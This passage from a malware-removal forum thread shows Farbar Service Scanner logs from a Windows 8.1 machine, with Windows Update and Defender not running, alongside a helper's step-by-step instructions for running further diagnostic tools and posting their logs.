C:\Windows\System32\bfe.dll => File is digitally signed

C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed

C:\Windows\System32\wscsvc.dll => File is digitally signed

C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed

C:\Windows\System32\wuaueng.dll => File is digitally signed

C:\Windows\System32\qmgr.dll => File is digitally signed

C:\Windows\System32\es.dll => File is digitally signed

C:\Windows\System32\cryptsvc.dll => File is digitally signed

C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed

C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed

C:\Windows\System32\ipnathlp.dll => File is digitally signed

C:\Windows\System32\iphlpsvc.dll => File is digitally signed

C:\Windows\System32\svchost.exe => File is digitally signed

C:\Windows\System32\rpcss.dll => File is digitally signed

**** End of log ****

(end)

FSS:

Farbar Service Scanner Version: 26-07-2015

Ran by user (administrator) on 08-09-2015 at 10:08:56

Running from "C:\Users\user\Downloads"

Microsoft Windows 8.1 with Bing (X64)

Boot Mode: Normal

****************************************************************

Internet Services:

============

Connection Status:

==============

Localhost is accessible.

LAN connected.

Google IP is accessible.

Google.com is accessible.

Yahoo.com is accessible.

Windows Firewall:

=============

Firewall Disabled Policy:

==================

System Restore:

============

System Restore Policy:

========================

Action Center:

============

Windows Update:

============

wuauserv Service is not running. Checking service configuration:

The start type of wuauserv service is OK.

The ImagePath of wuauserv service is OK.

The ServiceDll of wuauserv service is OK.

Windows Autoupdate Disabled Policy:

============================

Windows Defender:

==============

WinDefend Service is not running. Checking service configuration:

The start type of WinDefend service is OK.

The ImagePath of WinDefend service is OK.

Windows Defender Disabled Policy:

==========================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]

"DisableAntiSpyware"=DWORD:1

Other Services:

==============

File Check:

========

C:\Windows\System32\nsisvc.dll => File is digitally signed

C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed

C:\Windows\System32\dhcpcore.dll => File is digitally signed

C:\Windows\System32\drivers\afd.sys => File is digitally signed

C:\Windows\System32\drivers\tdx.sys => File is digitally signed

C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed

C:\Windows\System32\dnsrslvr.dll => File is digitally signed

C:\Windows\System32\mpssvc.dll => File is digitally signed

C:\Windows\System32\bfe.dll => File is digitally signed

C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed

C:\Windows\System32\wscsvc.dll => File is digitally signed

C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed

C:\Windows\System32\wuaueng.dll => File is digitally signed

C:\Windows\System32\qmgr.dll => File is digitally signed

C:\Windows\System32\es.dll => File is digitally signed

C:\Windows\System32\cryptsvc.dll => File is digitally signed

C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed

C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed

C:\Windows\System32\ipnathlp.dll => File is digitally signed

C:\Windows\System32\iphlpsvc.dll => File is digitally signed

C:\Windows\System32\svchost.exe => File is digitally signed

C:\Windows\System32\rpcss.dll => File is digitally signed

**** End of log ****

Edited by xander291190, 07 September 2015 - 06:16 PM.

#13
Nevan

Posted 09 September 2015 - 06:33 AM

Trusted Helper

Malware Removal
1,765 posts

Hello again, xander291190.

It looks like Windows Update is still not running. We have to keep trying to repair it.

Please perform the instructions below.

Step #1
Windows Update fix

Download Windows Update Automated Troubleshooter to your Desktop and run it. A window will appear.
Click Next and wait for the program to automatically detect and fix any problems found.
Once the fixing is done, restart your system.

Step #2

Farbar Service Scanner

Download FSS.exe to your desktop.
Right click FSS.exe on your desktop and click Run as administrator.
Make sure that all options are checked and click Scan
It will create a log (FSS.txt) on the Desktop.
Double click FSS.txt. Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply

Step #3

Scan with IDTool

Please download IDTool by Nathan and save the file to the desktop.
It will come as a zipped file, so you will need to unzip it. You may do it by right-clicking on it and choosing Extract All. Extract it to your desktop.

Enter the IDTool directory, right-click on icon and select Run as Administrator to start the tool.
IDTool needs Micorsoft .NET Framework environment to work properly, so if prompted to download & install it please agree.
Wait patiently until the cool will collect necessary data.
Once the main console is loaded, please press Rescan Computer and Generate a New Report.
When prompted at the main bar that Rescan is completed, press Generate Text Friendly Report for Forums.
Copy the entire content of the frame that appears. You may want to save it to a text file for your convenience.

Please include that in your next reply.

Things that should appear in your next post:

FSS.txt log content
IDTool log content

#14
xander291190

Posted 09 September 2015 - 09:01 AM

Member

Topic Starter
Member
13 posts

Hi Nevan,

Quick question, I'm not sure the IDTool is working properly for me. I've run as administrator, which is fine, it didn't prompt me to download the .NET framework. I left it for almost an hour thinking it was maybe doing something in the background, but cam back and it was just the same empty screen.

I then tried to download the .NET framework myself from the Microsoft website, but when i went to install it said I already had it and installation wasn't necessary.

Tried the tool again and left it, it did the same thing with nothing showing on the screen. I clicked rescan to see if it did anything and nothing happened, just immediately said scan complete and nothing was in the report. Not sure what to do with it from here.

Here's the other information you asked for in the meantime:

Farbar Service Scanner Version: 26-07-2015

Ran by user (administrator) on 10-09-2015 at 00:09:15

Running from "C:\Users\user\Downloads"

Microsoft Windows 8.1 with Bing (X64)

Boot Mode: Normal

****************************************************************

Internet Services:

============

Connection Status:

==============

Localhost is accessible.

LAN connected.

Google IP is accessible.

Google.com is accessible.

Yahoo.com is accessible.

Windows Firewall:

=============

Firewall Disabled Policy:

==================

System Restore:

============

System Restore Policy:

========================

Action Center:

============

Windows Update:

============

Windows Autoupdate Disabled Policy:

============================

Windows Defender:

==============

WinDefend Service is not running. Checking service configuration:

The start type of WinDefend service is OK.

The ImagePath of WinDefend service is OK.

Windows Defender Disabled Policy:

==========================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]

"DisableAntiSpyware"=DWORD:1

Other Services:

==============

File Check:

========

C:\Windows\System32\nsisvc.dll => File is digitally signed

C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed

C:\Windows\System32\dhcpcore.dll => File is digitally signed

C:\Windows\System32\drivers\afd.sys => File is digitally signed

C:\Windows\System32\drivers\tdx.sys => File is digitally signed

C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed

C:\Windows\System32\dnsrslvr.dll => File is digitally signed

C:\Windows\System32\mpssvc.dll => File is digitally signed

C:\Windows\System32\bfe.dll => File is digitally signed

C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed

C:\Windows\System32\wscsvc.dll => File is digitally signed

C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed

C:\Windows\System32\wuaueng.dll => File is digitally signed

C:\Windows\System32\qmgr.dll => File is digitally signed

C:\Windows\System32\es.dll => File is digitally signed

C:\Windows\System32\cryptsvc.dll => File is digitally signed

C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed

C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed

C:\Windows\System32\ipnathlp.dll => File is digitally signed

C:\Windows\System32\iphlpsvc.dll => File is digitally signed

C:\Windows\System32\svchost.exe => File is digitally signed

C:\Windows\System32\rpcss.dll => File is digitally signed

**** End of log ****

#15
Nevan

Posted 09 September 2015 - 10:25 AM

Trusted Helper

Malware Removal
1,765 posts

Hello again, xander.

Don't worry, it looks like everything's fine.

We're almost done. Please perform the following instructions.

Step #1

FRST Scan

Right click FRST64.exe on your Desktop and click Run as administrator. When the tool opens click Yes to disclaimer.
Make sure that Addition.txt is checked and press the Scan button.
It will produce two logs - one called FRST.txt and another one called Addition.txt in the same directory the tool is run from.
Select all (CTRL+A) the content of the logs, copy them (CTRL+C) and paste (CTRL+V) them into your next reply.

Step #2

Security Check

Download Security Check from here or here.

Save it to your Desktop.
Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
A Notepad document should open automatically called checkup.txt; please post the contents of that document.

NOTE: If SecurityCheck aborts and you get the following message: UNSUPPORTED OPERATING SYSTEM! ABORTED! try rebooting the system and then run SecurityCheck again.

Things that should appear in your next post:

FRST.txt log content
Addition.txt log content
Checkup.txt log content

Back to Virus, Spyware, Malware Removal · Next Unread Topic →

Also tagged with one or more of these keywords: chrome

Answered Software → Web Browsers and Email → Delay in "Save As" prompt in Chrome Started by Solice93 , 23 Jan 2022 Chrome, browser, google chrome and 1 more...	12 replies 2,045 views	Solice93 26 Jan 2022
Security → Virus, Spyware, Malware Removal → Laptop hangs often [Solved] Started by Hari Prahlad , 08 Mar 2021 Firefox, Chrome, Kaspersky and 1 more... 1 2 3	Hot 33 replies 9,590 views	DR M 17 Mar 2021
Security → Virus, Spyware, Malware Removal → Google Chrome keeps getting the default search set to Yahoo [Closed] Started by rocket-ron , 02 Oct 2020 chrome, changed default search and 1 more...	5 replies 2,824 views	Gary R 10 Oct 2020
Security → Virus, Spyware, Malware Removal → Your Connection is not private - Error Started by Emma Ryan , 05 Mar 2020 Error, Chrome, SSL Certificate	2 replies 2,584 views	Gary R 07 Mar 2020
Security → Virus, Spyware, Malware Removal → browser virus [Closed] Started by drewowens , 17 Jul 2018 browser hijacked, redirect virus and 1 more...	2 replies 3,718 views	JSntgRvr 23 Jul 2018